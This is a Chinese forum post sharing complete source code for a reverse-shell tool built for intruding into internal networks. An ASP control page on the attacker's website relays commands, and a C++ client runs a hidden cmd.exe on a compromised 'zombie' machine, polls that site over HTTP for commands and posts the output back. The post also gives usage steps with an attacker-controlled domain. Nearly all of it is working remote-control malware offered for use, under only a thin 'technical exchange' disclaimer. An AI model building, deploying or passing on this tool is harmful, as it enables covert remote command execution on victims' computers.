来源:x140yu
原理:用ASP实现反向连接,客户端shell.exe大小6K,控制端console.asp大小1.75K
详解:
灵感来自在入侵渗透内网时需反向连接但没有公网IP的时候,想到ASP的Application对象功能之强大,所以产生以下想法
肉机执行程序shell.exe让cmd.exe与偶网站一ASP程序进行交互,实现控制
Application("output")为输出流,保存程序执行结果
Application("input")为输入流,保存要执行的命令
思路:
[Client] <-----> [Control] <-----> [Attacker]
Client上运行shell.exe,Control运行console.asp,Attacker通过访问console.asp控制Client
实例:
肉机A,运行"shell.exe cooldiyer.uni.cc /cmd.asp"
偶网站放上cmd.asp,URL路径为http://cooldiyer.uni.cc/cmd.asp
这时我访问http://cooldiyer.uni.cc/cmd.asp?who=master (参数一定要加上,标明身份)
就可以进行控制了,Refresh刷新可以看到已经有结果了,输入命令,点Execute执行,过几秒钟后,
点击Refresh按钮可以看到执行结果,点击Clear清空输入输出流,执行"exit"程序退出
声明:
只做技术交流,程序只做演示使用,只实现与cmd.exe交互的功能,转载或修改需保留版权
代码:
console.asp
____________________________________________________________________________ <%
' 功能介绍:
' 用ASP实现反向SHELL连接,与cmd.exe交互,执行命令后点Refresh后就可以看到回显
' 公用变量 Application("input")、Application("output")为全局输入输出流
' 如果请求登录
if request("act") = "login" then
application("login") = "yes"
response.end
end if
' 如果请求退出
if request("act") = "exit" then
application("login") = "no"
application("input") = ""
application("outout") = ""
response.end
end if
' 验证是否已经登录
if application("login") <> "yes" and request("who") = "master" then
response.write "Client not connect.."
response.end
end if
' 如果请求执行命令,放到Input流里
if request("cmd") <> "" then
application("input") = request("cmd")
end if
' 如果命令执行完毕,结果放到output流,input流置空
if request("result")<>"" then
application("output") = application("output") + request("result")
application("input") = ""
end if
%>
<% If request("frame")="1" Then %>
<%
' 如果请求清空输入输出流
if request("act") = "clear" then
Application("input") = ""
Application("output") = ""
response.redirect request.servervariables("script_name")&"?frame=1"
end if
%>
<textarea cols=120 rows=30>
<%=application("output")%>
</textarea>
<a href=# onclick="location.replace(location.href);">Refresh</a>
<a href=?frame=1&act=clear>Clear</a>
<% elseif request("who") = "master" then %>
<html>
<head><title>ASP Console Manager By cooldiyer</title></head>
<body>
<iframe src=<%=request.servervariables("script_name")%>?frame=1 width=900 height=500 frameborder=0></iframe><br>
<form method=post name=frm>
<input type=text size=50 name="cmd">
<input type=hidden name="who" value="master">
<input type=submit value="Execute">
</form>
<script>frm.cmd.focus();</script>
<%
else
response.write application("input")
end if
%>____________________________________________________________________________ // shell.cpp : Defines the entry point for the console application.
//
// 实现功能: 与ASP控制端实现交互,实现反向连接
//
#include "stdafx.h"
#include "shell.h"
#include "afxinet.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#define BUFFER_SIZE 1024 // 读缓冲区大小
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
using namespace std;
CString URLEncode(const char* s); // URL 编码函数
BOOL PostRequest(const char *szFormData, char *szResult); // 向控制端发送请求函数
void DoShell(); // 与cmd.exe进行交互函数
char szServer[50], szPath[50]; // 公用变量
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
int nRetCode = 0;
// initialize MFC and print and error on failure
if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
{
// TOD change error code to suit your needs
cerr << _T("Fatal Error: MFC initialization failed") << endl;
nRetCode = 1;
}
printf("ASP Console Client By CoolDiyer\n");
if (argc == 3)
{
memset(szServer, 0, sizeof(szServer));
memset(szPath, 0, sizeof(szPath));
strcpy(szServer, argv[1]);
strcpy(szPath, argv[2]);
}
else
{
printf("Usage:\n\trshell <Server> <Path>\nExp.\n\trshell www.abc.com /x.asp\n");
return -1;
}
char szResult[1024];
PostRequest("act=login", szResult); //登录
DoShell(); // 执行与cmd.exe的交互
PostRequest("act=exit", szResult); //退出
return nRetCode;
}
//
// URL编码函数,返回一个CString变量
//
CString URLEncode(const char* s)
{
CString encoded = "";
int len = strlen(s);
char* buf = new char[16]; // way longer than needed
unsigned char c;
for(int i=0; i < len; i++)
{
c = s[i];
if ((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
(c >= '0' && c <= '9') || c == '.' || c == '-' || c == '_')
{
sprintf(buf, "%c", c);
encoded += buf;
continue;
}
if(c == ' ')
{
sprintf(buf, "%c", '+');
encoded += buf;
continue;
}
sprintf(buf, "%.2X", c);
encoded += "%";
encoded += buf;
}
delete[] buf;
return encoded;
}
//
// 表单发送函数,核心例程,返回接收到的内容,也就是要执行的命令
//
BOOL PostRequest(const char *szFormData, char *szResult)
{
unsigned int uRetry = 3; //重试三次
try{
loop:
CInternetSession session;
CHttpConnection *pConnection = session.GetHttpConnection(szServer);
CHttpFile *pFile = pConnection->OpenRequest(CHttpConnection::HTTP_VERB_POST, szPath);
// AddRequestHeaders是必要的
pFile->AddRequestHeaders("Content-Type: application/x-www-form-urlencoded");
CString szData;
if (pFile -> SendRequest(NULL,0,(LPVOID) szFormData, strlen(szFormData)+1))
{
while(pFile->ReadString(szData))
{
if (szResult != NULL)
strcpy(szResult, szData.GetBuffer(0));
}
pFile->Close();
}
session.Close();
}
catch(...){
if (uRetry --)
goto loop;
}
return TRUE;
}
//
// 让cmd.exe与ASP控制端进行交互的核心例程
//
void DoShell()
{
int ret;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof( sa );
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = TRUE;
HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
ret=CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0);
ret=CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0);
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
GetStartupInfo(&si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
PROCESS_INFORMATION processInfo;
char cmdLine[] = "cmd.exe";
ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo);
char buff[BUFFER_SIZE] = { 0 };
char szTmp[BUFFER_SIZE*3]; // 因为要把结果进行编码,所以缓冲区相对要大
unsigned long bytesRead = 0;
int i = 0;
while (TRUE)
{
memset(buff, 0, BUFFER_SIZE);
ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0);
for (i = 0; i < 5 && bytesRead == 0; i++)
{
Sleep(100);
ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL);
}
if (bytesRead)
{
ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );
if (!ret) break;
memset(szTmp, 0, sizeof(szTmp));
strcpy(szTmp, "result=");
strcat(szTmp, URLEncode(buff).GetBuffer(0));
printf("%s", szTmp);
PostRequest(szTmp, NULL); // 发送命令执行结果
printf("Post command result ok\n");
}
else
{
// 得到要执行的命令
do
{
PostRequest("get=yes", buff);
printf("get command\n");
::Sleep(1000); // 间隔为1秒
}
while (strlen(buff) <= 0);
printf("%s\n", buff);
// 命令为exit则退出
if (strcmp(buff, "exit") == 0) break; // 程序退出
strcat(buff, "\n"); // 加上换行
bytesRead = strlen(buff);
printf("execute command %s", buff);
// 执行命令
WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0);
}
}
TerminateProcess(processInfo.hProcess, 0);
CloseHandle(hReadPipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe1);
CloseHandle(hWritePipe2);
}____________________________________________________________________________
备注:
以上代码可能因过滤而显示错误,请下载压缩包(含全部源代码和编译好的程序):